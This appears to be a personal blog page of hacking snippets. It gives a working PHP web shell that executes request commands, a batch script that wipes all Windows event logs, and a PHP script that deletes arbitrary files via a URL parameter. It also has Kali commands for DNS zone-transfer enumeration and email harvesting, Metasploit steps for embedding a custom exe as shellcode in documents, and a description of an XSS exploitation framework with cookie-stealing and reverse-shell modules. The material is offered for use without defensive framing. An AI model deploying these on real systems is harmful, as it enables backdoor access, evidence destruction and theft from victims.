How the NSA is tracking people

http://apps.washingtonpost.com/g/page/national/how-the-nsa-is-tracking-people-right-now/634/?tid=sm_fb

Create a Java Certificate

keytool.exe -genkey -keyalg algorithm -alias my_alias -keystore myfilename.jks -storepass my_password -validity my_days -keysize my_size
Options:
 -alias <alias>                  alias name of the entry to process
 -keyalg <keyalg>                key algorithm name
 -keysize <keysize>              key bit size
 -sigalg <sigalg>                signature algorithm name
 -destalias <destalias>          destination alias
 -dname <dname>                  distinguished name
 -startdate <startdate>          certificate validity start date/time
 -ext <value>                    X.509 extension
 -validity <valDays>             validity number of days
 -keypass <arg>                  key password
 -keystore <keystore>            keystore name
 -storepass <arg>                keystore password
 -storetype <storetype>          keystore type
 -providername <providername>    provider name
 -providerclass <providerclass>  provider class name
 -providerarg <arg>              provider argument
 -providerpath <pathlist>        provider classpath
 -v                              verbose output
 -protected                      password through protected mechanism

Example:

keytool.exe -genkey -keyalg RSA -alias myjavacert -keystore mykeystore.jks -storepass 123456qwerty -validity 365 -keysize 2048

A quick and dirty php web shell

<?php
if(isset($_REQUEST['cmd'])){
	echo "Command: <span style='color:red;'><b>".$_REQUEST['cmd']."</b></span> executed.";
	echo "<pre style='border:solid 3px red;background:black;color:white;padding:10px;font-size:14px;'>";
	$cmd = ($_REQUEST['cmd']);
	system($cmd);
	echo "</ pre>";
	die;
}

Clear All Windows Logs

1) Create a .bat file
2) Append the following:

@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared! ^<press any key^>
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
pause>NUL

3)Run as administrator

PHP Command Injection Vulnerability in Web applications

Create a new PHP file, name it test_command_injection.php, and save it inside Apache’s htdocs directory:

<?php
if(isset($_GET['filename']))
{
	$filename = $_GET['filename'];
	if(file_exists($filename))
	{
		unlink($filename);
	}
}

Open your favorite browser and open url: http://localhost/test_command_injection.php?filename=path_to_file_4_deletion

As you can see you could delete any file in the system if you provide the right path..

Dnsrecon – Kali Linux

Open your Kali linux distribution..

Enumerate a domain

dnsrecon -d example.com

Test all NS Servers in a domain for misc zone transfers

dnsrecon -d example.com -t axfr

Help!

Version: 0.8.8
Usage: dnsrecon.py <options>
 
Options:
   -h, --help                  Show this help message and exit
   -d, --domain      <domain>  Domain to Target for enumeration.
   -r, --range       <range>   IP Range for reverse look-up brute force in formats (first-last)
                               or in (range/bitmask).
   -n, --name_server <name>    Domain server to use, if none is given the SOA of the
                               target will be used
   -D, --dictionary  <file>    Dictionary file of sub-domain and hostnames to use for
                               brute force.
   -f                          Filter out of Brute Force Domain lookup records that resolve to
                               the wildcard defined IP Address when saving records.
   -t, --type        <types>   Specify the type of enumeration to perform:
                               std      To Enumerate general record types, enumerates.
                                        SOA, NS, A, AAAA, MX and SRV if AXRF on the
                                        NS Servers fail.
 
                               rvl      To Reverse Look Up a given CIDR IP range.
 
                               brt      To Brute force Domains and Hosts using a given
                                        dictionary.
 
                               srv      To Enumerate common SRV Records for a given 
 
                                        domain.
 
                               axfr     Test all NS Servers in a domain for misconfigured
                                        zone transfers.
 
                               goo      Perform Google search for sub-domains and hosts.
 
                               snoop    To Perform a Cache Snooping against all NS 
                                        servers for a given domain, testing all with
                                        file containing the domains, file given with -D
                                        option.
 
                               tld      Will remove the TLD of given domain and test against
                                        all TLD's registered in IANA
 
                               zonewalk Will perform a DNSSEC Zone Walk using NSEC Records.
 
   -a                          Perform AXFR with the standard enumeration.
   -s                          Perform Reverse Look-up of ipv4 ranges in the SPF Record of the
                               targeted domain with the standard enumeration.
   -g                          Perform Google enumeration with the standard enumeration.
   -w                          Do deep whois record analysis and reverse look-up of IP
                               ranges found thru whois when doing standard query.
   -z                          Performs a DNSSEC Zone Walk with the standard enumeration.
   --threads          <number> Number of threads to use in Range Reverse Look-up, Forward
                               Look-up Brute force and SRV Record Enumeration
   --lifetime         <number> Time to wait for a server to response to a query.
   --db               <file>   SQLite 3 file to save found records.
   --xml              <file>   XML File to save found records.
   --iw                        Continua bruteforcing a domain even if a wildcard record resolution is 
                               discovered.
   -c, --csv          <file>   Comma separated value file.
   -j, --json         <file>   JSON file.
   -v                          Show attempts in the bruteforce modes.

Collect emails using kali linux

> Run your Kali Linux
> Open a terminal
> Type:

theharvester -d mydomain.com -b all

> Hit enter and wait for results.

How to generate shellcode from custom exe in metasploit

To use a custom exe as a payload or to use your custom exe in a document or excel file, you have to “convert” your exe to shellcode. To accomplish this:

1> Run Kali Linux

2> Open a terminal window

3> Type

msfconsole

and hit enter

4> Type

use payload/generic/custom

and hit enter

5> Choose your custom exe:

set PAYLOADFILE /root/Desktop/mycustomexe.exe

6> Choose optionally a name-title:

set PAYLOADSTR mycustomexe

7> Type

generate

and hit enter

 

OWASP Xenotix XSS Exploit Framework

OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1500+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes highly offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

SCANNER MODULES

  • Manual Mode Scanner
  • Auto Mode Scanner
  • DOM Scanner
  • Multiple Parameter Scanner
  • POST Request Scanner
  • Header Scanner
  • Fuzzer
  • Hidden Parameter Detector

INFORMATION GATHERING MODULES

  • WAF Fingerprinting
  • Victim Fingerprinting
  • Browser Fingerprinting
  • Browser Features Detector
  • Ping Scan
  • Port Scan
  • Internal Network Scan

EXPLOITATION MODULES

  • Send Message
  • Cookie Thief
  • Phisher
  • Tabnabbing
  • Keylogger
  • HTML5 DDoSer
  • Load File
  • Executable Drive By
  • JavaScript Shell
  • Reverse HTTP WebShell
  • Drive-By Reverse Shell
  • Metasploit Browser Exploit
  • Firefox Reverse Shell Addon (Persistent)
  • Firefox Session Stealer Addon (Persistent)
  • Firefox Keylogger Addon (Persistent)
  • Firefox DDoSer Addon (Persistent)
  • Firefox Linux Credential File Stealer Addon (Persistent)
  • Firefox Download and Execute Addon (Persistent)

UTILITY MODULES

  • WebKit Developer Tools
  • Payload Encoder
  • JavaScript Beautify
  • Hash Calculator
  • Hash Detector

 

Download

 

Defeat web trackers

Ghostery sees the “invisible” web, detecting trackers, web bugs, pixels, and beacons placed on web pages by Facebook, Google Analytics, and over 1,000 other ad networks, behavioral data providers, web publishers – all companies interested in your activity. After showing you who operates behind the scenes, Ghostery also gives you the opportunity to learn more about each company it identifies, including links to their privacy policy and opt-out options. Ghostery allows you to block scripts from companies that you don’t trust, delete local shared objects, and even block images and iframes.

Download for Firefox